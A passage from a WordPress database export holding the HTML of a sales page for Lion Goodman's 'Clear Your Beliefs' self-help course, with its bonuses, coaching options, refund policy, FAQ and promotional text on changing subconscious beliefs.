src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional Support On Your Journey</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>Take advantage of this up-close-and-personal support during the program.</strong>  Support sessions are optional, and are provided at an additional cost.  Choose the plan that suits you best - from the recorded program-only, to full support each week.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 01:48:14', '2014-06-19 06:48:14', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1045, 2, '2014-06-19 01:56:56', '2014-06-19 06:56:56', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my 